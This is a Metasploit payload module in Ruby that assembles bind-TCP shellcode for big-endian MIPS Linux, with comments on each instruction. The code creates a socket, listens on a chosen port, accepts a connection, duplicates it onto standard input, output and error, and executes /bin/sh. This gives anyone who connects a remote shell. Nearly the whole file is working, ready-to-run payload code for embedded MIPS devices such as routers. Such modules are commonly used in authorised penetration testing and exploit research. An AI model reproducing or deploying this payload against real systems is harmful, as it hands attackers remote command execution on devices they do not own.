##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # Single-stage bind TCP command shell for Linux on big-endian MIPS.
  #
  # The shellcode built in #generate does, in order: socket(), bind() on
  # 0.0.0.0:LPORT, listen(), accept(), dup2() of the accepted socket onto
  # fds 2/1/0, then execve("//bin/sh"). The listening port is assembled
  # into the instruction stream at generate time rather than patched in
  # afterwards, which is why 'Payload' => { 'Offsets' => {} } below is empty.
  #
  # From the host side this is observable as a process that opens a new
  # listening TCP socket and then exec's /bin/sh with all three standard
  # descriptors bound to the accepted connection.

  # Expected size in bytes of what #generate appends: 58 four-byte MIPS
  # instructions. Keep in sync if the shellcode below changes.
  CachedSize = 232

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] extra metadata merged over the defaults below
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Command Shell, Bind TCP Inline',
        'Description' => 'Listen for a connection and spawn a command shell',
        'Author' => [
          'scut', # Original mips-irix-portshell shellcode
          'vaicebine', # Original shellcode mod
          'Vlatko Kosturjak', # Metasploit module (mipsle)
          'juan vazquez' # mipsbe conversion plus small fixes and optimizations
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSBE,
        # The framework side connects to LPORT and drives a Unix shell over it.
        'Handler' => Msf::Handler::BindTcp,
        'Session' => Msf::Sessions::CommandShellUnix,
        # No fixed byte template: the bytes are produced by #generate, so there
        # is nothing for the framework to patch via Offsets.
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  # Builds the payload bytes with LPORT embedded.
  #
  # @param _opts [Hash] unused; kept for the Msf::Payload::Single interface
  # @return [String] whatever super returns followed by the shellcode, with
  #   LPORT placed in the 16-bit immediate of the `li t6` used to build the
  #   sockaddr_in; returns super alone when LPORT is not set in the datastore
  # @raise [ArgumentError] if LPORT is set but is not a valid integer string
  #   (Kernel#Integer is strict, unlike String#to_i)
  def generate(_opts = {})
    # Without a port there is nothing to assemble; defer to the default.
    if !datastore['LPORT']
      return super
    end

    port = Integer(datastore['LPORT'])
    # Big-endian 16-bit port split into two signed bytes; pack('C2') below
    # wraps negatives back into 0..255 when they are emitted.
    # NOTE(review): pack('n') keeps only the low 16 bits, so a value above
    # 65535 is silently truncated rather than rejected.
    port = [port].pack('n').unpack('cc')

    shellcode =
      # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
      # Arguments are built with nor/slti so the bytes avoid NULs.
      "\x27\xbd\xff\xe0" + # addiu sp,sp,-32
      "\x24\x0e\xff\xfd" + # li t6,-3
      "\x01\xc0\x20\x27" + # nor a0,t6,zero
      "\x01\xc0\x28\x27" + # nor a1,t6,zero
      "\x28\x06\xff\xff" + # slti a2,zero,-1
      "\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket )
      "\x01\x01\x01\x0c" + # syscall

      # bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
      # The 16-byte sockaddr_in is written at sp-32..sp-17; word 0 holds
      # AF_INET << 16 | port, the remaining words are zero (INADDR_ANY).
      "\x30\x50\xff\xff" + # andi s0,v0,0xffff
      "\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef
      "\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16)
      "\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3
      "\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2
      "\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000
      "\x24\x0e" + port.pack('C2') + # li t6,<LPORT> ; immediate is the port, e.g. 0x115c (4444, default LPORT)
      "\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c
      "\xaf\xad\xff\xe0" + # sw t5,-32(sp)
      "\xaf\xa0\xff\xe4" + # sw zero,-28(sp)
      "\xaf\xa0\xff\xe8" + # sw zero,-24(sp)
      "\xaf\xa0\xff\xec" + # sw zero,-20(sp)
      "\x02\x10\x20\x25" + # or a0,s0,s0
      "\x24\x0e\xff\xef" + # li t6,-17
      "\x01\xc0\x30\x27" + # nor a2,t6,zero
      "\x23\xa5\xff\xe0" + # addi a1,sp,-32
      "\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )
      "\x01\x01\x01\x0c" + # syscall

      # listen(3, 257) = 0
      "\x02\x10\x20\x25" + # or a0,s0,s0
      "\x24\x05\x01\x01" + # li a1,257
      "\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen )
      "\x01\x01\x01\x0c" + # syscall

      # accept(3, 0, NULL) = 4
      "\x02\x10\x20\x25" + # or a0,s0,s0
      "\x28\x05\xff\xff" + # slti a1,zero,-1
      "\x28\x06\xff\xff" + # slti a2,zero,-1
      "\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept )
      "\x01\x01\x01\x0c" + # syscall

      # dup2(4, 2) = 2
      # dup2(4, 1) = 1
      # dup2(4, 0) = 0
      # s1 starts at 2 (nor of -3) and counts down; the loop exits when it
      # reaches -1 (s0), so the accepted socket is dup'ed onto fds 2, 1, 0.
      "\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket
      "\x24\x11\xff\xfd" + # li s1,-3
      "\x02\x20\x88\x27" + # nor s1,s1,zero
      "\x8f\xa4\xff\xff" + # lw a0,-1(sp)
      "\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
      "\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 )
      "\x01\x01\x01\x0c" + # syscall 0x40404
      "\x24\x10\xff\xff" + # li s0,-1
      "\x22\x31\xff\xff" + # addi s1,s1,-1
      "\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop>

      # execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
      # "//bin/sh\0" is stored at sp-20; argv = { sp-20, NULL } is built at
      # sp-8; envp is NULL.
      "\x28\x06\xff\xff" + # slti a2,zero,-1
      "\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
      "\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
      "\xaf\xaf\xff\xec" + # sw t7,-20(sp)
      "\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
      "\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
      "\xaf\xae\xff\xf0" + # sw t6,-16(sp)
      "\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
      "\x27\xa4\xff\xec" + # addiu a0,sp,-20
      "\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
      "\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
      "\x27\xa5\xff\xf8" + # addiu a1,sp,-8
      "\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve )
      "\x01\x01\x01\x0c" # syscall 0x40404

    return super + shellcode
  end
end